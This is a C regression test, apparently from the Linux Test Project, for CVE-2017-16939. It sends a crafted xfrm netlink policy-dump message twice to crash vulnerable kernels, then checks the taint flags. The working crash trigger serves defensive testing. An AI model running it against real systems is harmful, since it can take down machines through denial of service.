1// SPDX-License-Identifier: GPL-2.0-or-later 2/* 3 * Copyright (c) 2018 Michael Moese <mmoese@suse.de> 4 */ 5/* Regression test for commit: 6 * 1137b5e2529a ipsec: Fix aborted xfrm policy dump crash aka CVE-2017-16939 7 * 8 * Based on the reproducing code from Mohammed Ghannam, published on 9 * https://blogs.securiteam.com/index.php/archives/3535 10 * 11 * CAUTION! If your system is vulnerable to this CVE, the kernel 12 * WILL DIE! 13 */ 14 15#include <unistd.h> 16#include <stdlib.h> 17#include <string.h> 18#include <sys/socket.h> 19#include <sys/wait.h> 20#include <netinet/in.h> 21#include <linux/netlink.h> 22 23#include "lapi/xfrm.h" 24#include "tst_test.h" 25#include "tst_res_flags.h" 26#include "tst_safe_macros.h" 27#include "tst_safe_net.h" 28#include "lapi/sched.h" 29 30static int fd = -1; 31static struct sockaddr_nl nl_addr; 32static struct nlmsghdr xfrm_msg; 33 34static void setup(void) 35{ 36 tst_setup_netns(); 37 38 nl_addr.nl_family = AF_NETLINK; 39 nl_addr.nl_pid = 0; /* packet goes into the kernel */ 40 nl_addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */ 41 42 xfrm_msg.nlmsg_len = NLMSG_LENGTH(0); 43 xfrm_msg.nlmsg_type = XFRM_MSG_GETPOLICY; 44 xfrm_msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST; 45 xfrm_msg.nlmsg_seq = 0x1; 46 xfrm_msg.nlmsg_pid = 2; 47} 48 49static void send_nlmsg(int fd, struct nlmsghdr *msg, struct sockaddr_nl *addr) 50{ 51 SAFE_SENDTO(1, fd, (void *)msg, msg->nlmsg_len, 0, 52 (struct sockaddr *)addr, sizeof(struct sockaddr_nl)); 53} 54 55static void run(void) 56{ 57 fd = SAFE_SOCKET(PF_NETLINK, SOCK_RAW, NETLINK_XFRM); 58 SAFE_SETSOCKOPT_INT(fd, SOL_SOCKET, SO_RCVBUF, 0x100); 59 60 /* message must be sent twice to trigger the bug */ 61 send_nlmsg(fd, &xfrm_msg, &nl_addr); 62 send_nlmsg(fd, &xfrm_msg, &nl_addr); 63 SAFE_CLOSE(fd); 64 65 /* wait for socket close callback to crash */ 66 usleep(100000); 67 68 if (tst_taint_check()) { 69 tst_res(TFAIL, "Kernel is vulnerable"); 70 return; 71 } 72 73 tst_res(TPASS, "Kernel seems to have survived"); 74} 75 76static void cleanup(void) 77{ 78 if (fd >= 0) 79 SAFE_CLOSE(fd); 80} 81 82static struct tst_test test = { 83 .setup = setup, 84 .test_all = run, 85 .cleanup = cleanup, 86 .taint_check = TST_TAINT_W | TST_TAINT_D, 87 .needs_kconfigs = (const char *[]) { 88 "CONFIG_USER_NS=y", 89 "CONFIG_NET_NS=y", 90 NULL 91 }, 92 .save_restore = (const struct tst_path_val[]) { 93 {"/proc/sys/user/max_user_namespaces", "1024", TST_SR_SKIP}, 94 {} 95 }, 96 .tags = (const struct tst_tag[]) { 97 {"linux-git", "1137b5e2529a"}, 98 {"CVE", "2017-16939"}, 99 {} 100 } 101}; 102